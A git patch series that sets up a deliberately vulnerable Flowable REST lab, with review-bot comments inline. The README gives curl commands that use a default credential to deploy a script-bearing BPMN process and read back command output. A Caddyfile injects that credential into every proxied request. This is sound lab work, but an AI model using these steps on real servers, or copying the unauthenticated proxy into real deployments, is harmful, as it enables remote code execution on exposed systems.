From c8343015167ddb21e50395002210d9269d122843 Mon Sep 17 00:00:00 2001
From: devampkid
Date: Wed, 13 Aug 2025 03:48:05 +0400
Subject: [PATCH 1/5] Flowable exposed UI
---
flowable/exposed_ui/README.md | 21 +++++++++++++++++++++
1 file changed, 21 insertions(+)
create mode 100644 flowable/exposed_ui/README.md
diff --git a/flowable/exposed_ui/README.md b/flowable/exposed_ui/README.md
new file mode 100644
index 00000000..7a2e975a
--- /dev/null
+++ b/flowable/exposed_ui/README.md
@@ -0,0 +1,21 @@
+# Exposed UI Setup
+```bash
+docker run -p 127.0.0.1:8080:8080 flowable/flowable-rest
+```
+
+# How to Exploit the Exposed UI
+```bash
+curl -X POST \
+ 'http://localhost:4200/flowable-rest/service/repository/deployments' \ -H 'Content-Type: multipart/form-data' \ -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \ -F 'file=@jsScript.bpmn'
+
+curl -X POST \
+ 'http://localhost:4200/flowable-rest/service/runtime/process-instances' \ -H 'Content-Type: application/json' \ -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \ -d '{
+ "processDefinitionKey": "jsScriptProcess"
+ }'
+```
\ No newline at end of file
From 16062c163037a17e04f2bfbf2b30d792bab63c96 Mon Sep 17 00:00:00 2001
From: devampkid
Date: Wed, 13 Aug 2025 04:02:18 +0400
Subject: [PATCH 2/5] minor: fix ports of curl cmds
---
flowable/exposed_ui/README.md | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/flowable/exposed_ui/README.md b/flowable/exposed_ui/README.md
index 7a2e975a..f6b28938 100644
--- a/flowable/exposed_ui/README.md
+++ b/flowable/exposed_ui/README.md
@@ -6,13 +6,13 @@ docker run -p 127.0.0.1:8080:8080 flowable/flowable-rest # How to Exploit the Exposed UI ```bash curl -X POST \
- 'http://localhost:4200/flowable-rest/service/repository/deployments' \
+ 'http://localhost:8080/flowable-rest/service/repository/deployments' \ -H 'Content-Type: multipart/form-data' \ -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \ -F 'file=@jsScript.bpmn' curl -X POST \
- 'http://localhost:4200/flowable-rest/service/runtime/process-instances' \
+ 'http://localhost:8080/flowable-rest/service/runtime/process-instances' \ -H 'Content-Type: application/json' \ -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \ -d '{
From 1124b318f07a64d95e07fa53eda7676188b801f8 Mon Sep 17 00:00:00 2001
From: devampkid
Date: Wed, 13 Aug 2025 04:16:33 +0400
Subject: [PATCH 3/5] add jsScript.bpmn
---
flowable/exposed_ui/jsScript.bpmn | 30 ++++++++++++++++++++++++++++++
1 file changed, 30 insertions(+)
create mode 100644 flowable/exposed_ui/jsScript.bpmn
diff --git a/flowable/exposed_ui/jsScript.bpmn b/flowable/exposed_ui/jsScript.bpmn
new file mode 100644
index 00000000..0ec2779e
--- /dev/null
+++ b/flowable/exposed_ui/jsScript.bpmn
@@ -0,0 +1,30 @@ + + + + + + + + + + + + + +
From 1a54d32ee84cdbf6d8b52615d40fc48eeb08f809 Mon Sep 17 00:00:00 2001
From: devampkid
Date: Wed, 13 Aug 2025 14:36:48 +0400
Subject: [PATCH 4/5] finished the setup
---
flowable/exposed_ui/Caddyfile | 5 +++++
flowable/exposed_ui/README.md | 4 ++--
flowable/exposed_ui/docker-compose.yml | 24 ++++++++++++++++++++++++
3 files changed, 31 insertions(+), 2 deletions(-)
create mode 100644 flowable/exposed_ui/Caddyfile
create mode 100644 flowable/exposed_ui/docker-compose.yml
diff --git a/flowable/exposed_ui/Caddyfile b/flowable/exposed_ui/Caddyfile
new file mode 100644
index 00000000..a5808bf7
--- /dev/null
+++ b/flowable/exposed_ui/Caddyfile
@@ -0,0 +1,5 @@
+:8081 {
+ reverse_proxy flowable:8080 {
+ header_up Authorization "Basic cmVzdC1hZG1pbjp0ZXN0"
+ }
+}
\ No newline at end of file
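Review bot: Nothing in the Caddyfile says that `header_up Authorization "Basic …"` is the deliberate weakness of this lab, and a reader who copies the file into a real deployment would ship an unauthenticated front door: the proxy stamps one fixed credential (presumably the image's default REST user) onto every request it forwards, so whoever can reach port 8081 gets that user's access to the Flowable REST API without presenting anything of their own. Add a comment above `:8081 {` such as `# INTENTIONALLY VULNERABLE: injects a fixed credential into every proxied request, so the REST API behind this listener needs no authentication. Lab use only.` Since `header_up` with a value sets the field, any `Authorization` header the client sends is presumably replaced rather than validated — the README at this point still sends its own header through this proxy, so that is worth stating as well. A credential committed to a tracked file also ends up in every clone; for a lab this may be intended, but a short note saying so keeps it from being mistaken for an accident.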
diff --git a/flowable/exposed_ui/README.md b/flowable/exposed_ui/README.md
index f6b28938..438b4920 100644
--- a/flowable/exposed_ui/README.md
+++ b/flowable/exposed_ui/README.md
@@ -6,13 +6,13 @@ docker run -p 127.0.0.1:8080:8080 flowable/flowable-rest # How to Exploit the Exposed UI ```bash curl -X POST \
- 'http://localhost:8080/flowable-rest/service/repository/deployments' \
+ 'http://localhost:8081/flowable-rest/service/repository/deployments' \ -H 'Content-Type: multipart/form-data' \ -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \ -F 'file=@jsScript.bpmn' curl -X POST \
- 'http://localhost:8080/flowable-rest/service/runtime/process-instances' \
+ 'http://localhost:8081/flowable-rest/service/runtime/process-instances' \ -H 'Content-Type: application/json' \ -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \ -d '{
diff --git a/flowable/exposed_ui/docker-compose.yml b/flowable/exposed_ui/docker-compose.yml
new file mode 100644
index 00000000..216aeb5d
--- /dev/null
+++ b/flowable/exposed_ui/docker-compose.yml
@@ -0,0 +1,24 @@
+version: '3'
+
+services:
+ flowable:
+ image: flowable/flowable-rest
+ container_name: flowable-rest
+ networks:
+ - flowable-network
+
+ caddy:
+ image: caddy:2.8.4
+ container_name: caddy-proxy
+ ports:
+ - "8081:8081"
+ volumes:
+ - ./Caddyfile:/etc/caddy/Caddyfile
+ networks:
+ - flowable-network
+ depends_on:
+ - flowable
+
+networks:
+ flowable-network:
+ driver: bridge
\ No newline at end of file
From cc2800002541a49fe29b344f8ca8eeb92c266711 Mon Sep 17 00:00:00 2001
From: devampkid
Date: Tue, 30 Sep 2025 20:06:44 +0400
Subject: [PATCH 5/5] updated README.md contains both secure and vulnerable setup instructions
---
flowable/exposed_ui/README.md | 13 +++++++------
flowable/exposed_ui/docker-compose.yml | 2 ++
2 files changed, 9 insertions(+), 6 deletions(-)
diff --git a/flowable/exposed_ui/README.md b/flowable/exposed_ui/README.md
index 438b4920..5f9bdcc2 100644
--- a/flowable/exposed_ui/README.md
+++ b/flowable/exposed_ui/README.md
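Review bot: `- "8081:8081"` publishes the credential-injecting proxy on every interface of the Docker host, whereas the `docker run -p 127.0.0.1:8080:8080` line this setup replaces kept the lab loopback-only, so any machine on the same network now gets unauthenticated access to the Flowable REST API (including the script-process deployment the README walks through). Bind it to loopback with `- "127.0.0.1:8081:8081"`; the same applies to the `- "8080:8080"` mapping that patch 5 adds to the `flowable` service, which exposes the instance that accepts the credential hard-coded in the Caddyfile. `image: flowable/flowable-rest` is left unpinned while `caddy` is pinned to `2.8.4`, so the lab can change behaviour as the upstream tag moves; pin a tag, e.g. `image: flowable/flowable-rest:<pinned-version>`. `version: '3'` is obsolete in Compose v2, which ignores it with a warning, so it can be dropped.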
@@ -1,21 +1,22 @@
-# Exposed UI Setup
+# Setup secure and vulnerable Flowable instances ```bash
-docker run -p 127.0.0.1:8080:8080 flowable/flowable-rest
+docker compose up ```
+test secure instance with this URL: http://localhost:8080/flowable-rest/service/repository/deployments
+test vulnerable instance with this URL: http://localhost:8081/flowable-rest/service/repository/deployments
-# How to Exploit the Exposed UI
+# How to Exploit the Exposed UI (on Vulnerable Instance) ```bash curl -X POST \ 'http://localhost:8081/flowable-rest/service/repository/deployments' \ -H 'Content-Type: multipart/form-data' \
- -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \ -F 'file=@jsScript.bpmn' curl -X POST \ 'http://localhost:8081/flowable-rest/service/runtime/process-instances' \ -H 'Content-Type: application/json' \
- -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \ -d '{ "processDefinitionKey": "jsScriptProcess" }'
-```
\ No newline at end of file
+```
+Look for the `"variables":[{"name":"commandOutput","type":"string","value":"` at output of the last command.
\ No newline at end of file
diff --git a/flowable/exposed_ui/docker-compose.yml b/flowable/exposed_ui/docker-compose.yml
index 216aeb5d..7a7ec456 100644
--- a/flowable/exposed_ui/docker-compose.yml
+++ b/flowable/exposed_ui/docker-compose.yml
@@ -4,6 +4,8 @@ services: flowable: image: flowable/flowable-rest container_name: flowable-rest
+ ports:
+ - "8080:8080" networks: - flowable-network